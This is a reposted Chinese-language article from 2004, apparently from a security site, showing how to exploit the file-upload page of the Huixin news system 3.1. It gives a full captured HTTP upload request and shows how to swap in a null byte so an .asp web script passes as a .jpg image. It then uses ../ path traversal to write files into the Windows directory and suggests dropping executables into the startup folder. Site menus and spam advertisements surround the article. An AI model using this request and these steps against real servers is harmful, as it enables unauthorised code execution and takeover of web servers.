云联天下首页 |  登陆 |  注册 |  密码找回 |  关于我们 | 加入收藏 
首页技术资料系统/服务器→文件上传漏洞在惠信中的应用 【字号: 】 【背景色 杏仁黄 秋叶褐 胭脂红 芥末绿 天蓝 雪青 灰 银河白(默认色)

文件上传漏洞在惠信中的应用
网址来源:http://www.kehui.net发布时间: 2004-11-05 11:40:28
文章属性:原创
文章提交:haixiao (hardpin100_at_yahoo.com.cn)

近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!
惠信新闻系统3.1 windows2000+sp4
先看这句代码。admin_uploadfilesave.asp
...............
Server.mappath(formPath&file.FileName)
............................
保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定的路径 ,改路径的话,上传不会成功)
这是我捕获的数据:
POST /admin_uploadfilesave.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1/admin_uploadfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 658
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL

-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="act"

upload
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="upcount"

1
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="filepath"

newstxt/
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="file1"; filename="G:www.asp .jpg"
Content-Type: text/plain

<% language=vbscript %>
<ihihoiojpojppokkhhkhkhkhk
hkhjkjkjjlkkkkkk>

-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="Submit"

提交
-----------------------------7d42cb1f101ae--
我将其中filename 处改为www.asp+(空格).jpg,同dvbbs利用一样改content_length的长度,然后用编辑器修改空格十六进制20为00,上传成功!呵呵!

再看路径我们不能改,那能不能利用../../这样的方式回切呢?试试就知道了,捕获数据同上,将name="filepath"
newstxt/ 改为: newstxt/../../../winnt
content-length:658 改为:(658+14)672
好,开始上传,哈哈!在winnt下发现www.asp文件。那我们就可以将路径改为windows的自启动目录,上传exe,vbs,bat...文件。不过以上都要在获得新闻系统的管理者之后,进一步进入。

白衫 

相关新闻
v Do All in Cmd Shell 2004-11-05 11:41:29
v 测试防火墙系统 2004-11-05 11:42:21
v 居安思危--论补丁管理之理论 2004-11-05 11:52:00
v 剖析Windows系统服务调用机制 2004-11-05 11:53:24
v 《再谈进程与端口的映射》之狗尾续貂篇 2004-11-05 11:54:51
v 木桶新理论与信息安全 2004-11-06 05:44:52
v FreeBSD 中文转码(zh-hztty-2.0) 2004-11-15 06:57:58
v port tree 更新 2004-11-15 06:58:27
v cvsup daemon 2004-11-15 06:58:53
v FreeBSD命令 lastcomm介绍 3.实际操作 2004-11-15 06:59:20
  最新新闻
智慧家居
智慧家居颠覆传统智能家居
智慧云谷让智能家居变成有智慧的
智慧云谷引领智慧家居新生活
科技改变生活 智慧云谷智慧家居系
智慧家居领航者,智慧云谷助你玩
智能家居如何赢得市场美誉度?
智慧云谷智慧家居:创业者有无限
WiFi智能家居你还在用?这样的智
互联网+助推智能家居产业
智慧云谷为您打造真正的智能家居
智能家居产业需要的不是单品,而
新家如何选择开关?智慧云谷iWis
智能传感器-世界首款“智”为你的
智慧云谷开关智能安防智能空气质
智能开关品牌,如何选择智能开关
秋季干燥,智慧家居温湿度传感器
传感器助力智慧家居 感知爱家
iWiscloud智能触摸开关缔造家居装

  最新帖子
 ※室内空气污染的危害及  [sensor]
 ※超声波风速传感器在生  [sensor]
 ※这么冷清  [gabc111]
 ※手机APP操作有问题  [ssy11407]
 ※智慧云谷智慧家居将在  [cici]
 ※上传下载  [cici]
 ※下载智慧家居  [apple2008]
 ※秋季干燥,智慧家居温  [apple2008]
 ※智慧家居紧扣热点 安全  [apple2008]
 ※办公大楼如何智慧化管  [apple2008]
 ※智慧云谷工业自控的优  [apple2008]
 ※传感器助力智慧家居 感  [apple2008]
 ※智能开关品牌,如何选  [apple2008]
 ※智慧云谷开关智能安防  [apple2008]
 ※没有专业人员,如何安  [apple2008]
 ※烟台智慧云谷董事长任  [apple2008]
 ※互联网+助推智能家居产  [apple2008]
 ※WiFi智能家居你还在用  [apple2008]
 ※智慧云谷智慧家居:创  [apple2008]
 ※智能家居如何赢得市场  [apple2008]
钯碳回收 硝酸银回收 银浆回收 银焊条回收 回收银浆 氯化钯回收 氯化钯回收 氧化钯回收 回收硝酸钯 钯水回收价格 海绵钯回收 钯炭回收价格 回收镀金板 深圳钯碳回收 镇江氯化钯回收 杭州钯浆回收 银浆回收多少钱 回收钯碳公司 硝酸银的价格 那里有回收金 氯化钯回收价格 江苏擦银布回收 硝酸银价格 德州钯粉回收 银铜回收 回收钯粉 回收铂碳催化剂 佛山钯碳回收 金盐回收价格 海绵钯回收 钯碳高价回收 钯回收价格 钯炭回收